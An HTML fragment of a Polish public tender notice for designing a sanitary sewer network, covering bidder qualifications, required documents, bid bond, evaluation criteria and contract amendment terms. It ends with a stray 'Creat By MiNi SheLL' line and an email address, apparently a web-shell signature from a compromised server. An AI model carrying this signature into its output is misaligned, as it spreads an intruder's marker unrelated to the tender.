                Określenie warunków:
                Zamawiający nie określa warunku w tym zakresie. 
<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie określa warunku w tym zakresie. <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Za minimalny poziom zdolności uznane zostanie, wykazanie przez Wykonawcę, że:

1. w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie wykonał usługi, których należyte wykonanie zostało potwierdzone przez poprzednich zamawiających, w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia:

1.1. minimum 2 usługi polegające na wykonaniu projektu/koncepcji sieci kanalizacyjnej sanitarnej grawitacyjno-ciśnieniowej o wartości minimum 500.000 zł brutto każda, przy czym łączna długość sieci w ramach jednej usługi winna wynosić co najmniej 5 km,

2. skieruje do realizacji zamówienia publicznego osoby, w szczególności odpowiedzialne za świadczenie usług tj.:

2.1. minimum 1 osobę wyznaczoną do pełnienia funkcji Kierownika zespołu projektowego/ głównego projektanta z uprawnieniami  do projektowania w branży instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń zgodnie z Ustawą z dnia 7 lipca 1994 roku Prawo budowlane (Dz.U.2016 poz.290 z późn. zm.) lub odpowiadające im ważne uprawnienia budowlane;

2.2. minimum 1 osobę z uprawnieniami do projektowania w branży inżynieryjnej drogowej bez ograniczeń zgodnie z Ustawą z dnia 7 lipca 1994 roku Prawo budowlane (Dz.U.2016 poz.290 z późn. zm.) lub odpowiadające im ważne uprawnienia budowlane;

2.3. minimum 1 osobę z uprawnieniami do projektowania w branży i instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń zgodnie z Ustawą z dnia 7 lipca 1994 roku Prawo budowlane (Dz.U.2016 poz.290 z późn. zm.)  lub odpowiadające im ważne uprawnienia budowlane.

  Zamawiający dopuszcza posiadanie przez 1 osobę więcej niż jednego z ww. uprawnień.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">W celu potwierdzenia przez wykonawcę, którego oferta została najwyżej oceniona braku podstaw wykluczenia, zgodnie z art. 26 ust. 2 ustawy Pzp Zamawiający wezwie do złożenia w terminie 5 dni, następujących oświadczeń i dokumentów aktualnych na dzień ich złożenia:
	
1. odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Pzp.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />W celu potwierdzenia spełniania przez Wykonawcę, którego oferta została najwyżej oceniona, warunków udziału w postępowaniu, zgodnie z art. 26 ust. 2 ustawy Pzp Zamawiający wezwie do złożenia  w terminie 5 dni, następujących oświadczeń i dokumentów aktualnych na dzień ich złożenia: 
	
1. wykazu usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert - wzór wykazu stanowi załącznik nr 6 do SIWZ

2. wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - wzór wykazu stanowi załącznik nr 7 do SIWZ.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">Zamawiający nie wymaga oświadczeń ani dokumentów w celu potwierdzenia okoliczności o których mowa w art. 25 ust.1 pkt. 2 ustawy Pzp</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Ponadto do oferty należy załączyć:
1.Formularz ofertowy - załącznik nr 1 do SIWZ (wskazana data podpisania);
2.Formularz cenowy - załącznik nr 2 do SIWZ (wskazana data podpisania);
3.Pełnomocnictwo do reprezentowania Wykonawcy  jeżeli zostało ustanowione bądź do reprezentowania Wykonawców wspólnie ubiegających się o zamówienie przedłożone w formie oryginału lub kopii poświadczonej przez notariusza (dotyczy również spółki cywilnej); pełnomocnictwo ustanowione do reprezentowania Wykonawców wspólnie ubiegających się o zamówienie przedłożone w formie oryginału lub kopii poświadczonej przez notariusza;
4.  dokument(-y), np. zobowiązanie podmiotów, na zasobach których Wykonawca będzie polegał w trybie art. 22a ustawy Pzp, do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia,   treści których musi wynikać w szczególności:
- zakres dostępnych Wykonawcy zasobów innego podmiotu,
- sposób wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia publicznego,
- zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia publicznego,
- czy podmiot, na zdolnościach którego Wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia;
5.Potwierdzenie wniesienia wadium.
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Wykonawca przystępujący do przetargu jest zobowiązany wnieść wadium w wysokości 15.000,00 zł (słownie: piętnaście tysięcy złotych) w formach określonych w art. 45 ust. 6 ustawy Pzp.</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin wykonania</td><td>20</td></tr><tr><td>doświadczenie kierownika zespołu projektowego</td><td>20</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.	Zakazuje się zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Jednostki Projektowej, chyba że Zamawiający przewidział możliwość dokonania takiej zmiany 
w ogłoszeniu o zamówieniu lub w Specyfikacji Istotnych Warunków Zamówienia oraz określił warunki takiej zmiany.
2.	Zamawiający przewiduje możliwość dokonania zmian postanowień niniejszej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Jednostki Projektowej, w zakresie;
2.1.	 zmian terminu wykonania zamówienia i terminów pośrednich w następujących przypadkach:
2.1.1.	wystąpienia siły wyższej rozumianej jako wystąpienie zdarzenia nadzwyczajnego, zewnętrznego, niemożliwego do przewidzenia i zapobieżenia, którego nie udało się uniknąć nawet przy zachowaniu najwyższej staranności, a które uniemożliwia Jednostce Projektowej wykonanie jego zobowiązania w całości lub w części,
2.1.2.	zmiany przepisów prawa Unii Europejskiej lub prawa krajowego, co powoduje konieczność dostosowania dokumentacji do zmian przepisów, które nastąpiły w trakcie realizacji zamówienia,
2.1.3.	niezawinionych przez Jednostkę Projektową opóźnień w uzyskaniu wymaganych, uzgodnień, decyzji lub opinii innych organów,
2.1.4.	konieczności wykonania usług dodatkowych i zamiennych akceptowanych przez zamawiającego,
2.2.	zmiany wysokości wynagrodzenia Jednostki Projektowej za wykonanie całości lub części zamówienia 
w następujących przypadkach: 
2.2.1.	wystąpienia usług dodatkowych, Jednostka Projektowa przystąpi do wykonania robót dodatkowych wyłącznie po zawarciu aneksu do umowy,
2.2.2.	wystąpienia zmian przepisów prawa w trakcie realizacji zamówienia, powodujące konieczność dostosowania dokumentacji projektowej,
2.3.	 zmiany wysokości wynagrodzenia należnego Jednostki Projektowej  w przypadku zmiany:
2.3.1.	stawki podatku VAT na skutek zmian w przepisach prawnych: 
2.3.1.1 w przypadku zwiększenia stawki podatku VAT  ceny jednostkowe brutto nie mogą być wyższe niż zadeklarowane w ofercie. 
2.3.1.2 w przypadku zmniejszenia stawki podatku VAT  ceny jednostkowe brutto zostaną odpowiednio pomniejszone w odniesieniu do cen zadeklarowanych w ofercie. Maksymalna nominalna wartość umowy może ulec zmniejszeniu.
2.4.	w pozostałym zakresie do zmian do umowy stosuje się art. 144 ust.1 pkt. 2 pkt. 3, pkt. 4, pkt. 5, pkt. 6, ust. 1a, ust. 1b, ust. 1c, ust. 1d, ust. 1e, oraz ust. 2 i ust. 3 ustawy Pzp.
3.	W przypadku wystąpienia okoliczności skutkujących koniecznością zmiany umowy, Jednostka Projektowa zobowiązana jest do niezwłocznego poinformowania o tym fakcie zamawiającego i wystąpienia z wnioskiem 
o dokonanie wskazanej zmiany.
4.	Z okoliczności stanowiących podstawę zmiany do umowy zostanie sporządzony protokół podpisany przez obie strony.
5.	Zmiana umowy powinna nastąpić w formie pisemnego aneksu podpisanego przez obie strony pod rygorem nieważności takiego oświadczenia oraz powinna zawierać uzasadnienie faktyczne i prawne.
6.	Zmiany do umowy w sprawie zamówienia publicznego bez zachowania i uzupełnienia treści umowy bez zachowania formy pisemnej jest dotknięta sankcją nieważności, a więc nie wywołuje skutków prawnych. 
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 15/05/2017, godzina: 9:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />Uszczegółowienie sekcji IV.2.2:
W  ramach kryterium Termin realizacji ocena będzie dokonywana na podstawie deklaracji zawartej w Formularzu ofertowym (zał. nr 1 do SIWZ).  Termin winien być określony w dniach kalendarzowych od dnia podpisania umowy. Należy podać ilość dni z przedziału pomiędzy 136 a 150 dniami. Brak deklaracji terminu realizacji  lub wskazanie terminu dłuższego niż 150 dni kalendarzowych skutkować będzie odrzuceniem oferty na podstawie art. 89 ust. 1 pkt. 2 ustawy Pzp. W przypadku zadeklarowania przez Wykonawcę terminu, krótszego niż 136 dni kalendarzowych, do potrzeb oceny ofert będzie przyjęte 136 dni kalendarzowych natomiast do umowy zostanie przyjęty termin zadeklarowany w ofercie.

W ramach kryterium doświadczenie Kierownika zespołu projektowego/ głównego projektanta ocena będzie dokonana na podstawie informacji o doświadczeniu osoby wyznaczonej do pełnienia funkcji Kierownika zespołu projektowego/ głównego projektanta w pełnieniu funkcji Kierownika lub Głównego projektanta zespołu projektowego, który opracował koncepcję projektową obejmującą budowę sieci wodociągowej i kanalizacyjnej.
Jeżeli Wykonawca wykaże, że Kierownik zespołu projektowego/ główny projektant trzykrotnie pełnił funkcję Kierownika lub Głównego projektanta zespołu projektowego, który opracował koncepcję projektową obejmującą budowę sieci wodociągowej i kanalizacyjnej otrzyma 5 pkt., czterokrotne  10 pkt., pięciokrotnie  15 pkt., sześciokrotnie lub więcej - 20 pkt.
Ocena zostanie dokonana na podstawie danych dotyczących doświadczenia Kierownika zespołu projektowego podanych w Formularzu ofertowym przy czym do potrzeb oceny niezbędne jest podanie minimum informacji o każdym zadaniu istotnym z punktu widzenia kryterium, w którym pełnił funkcje kierownicze tj. nazwa zadania, nazwa zlecającego zadanie, termin realizacji zadania, wartość zadania.
</div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com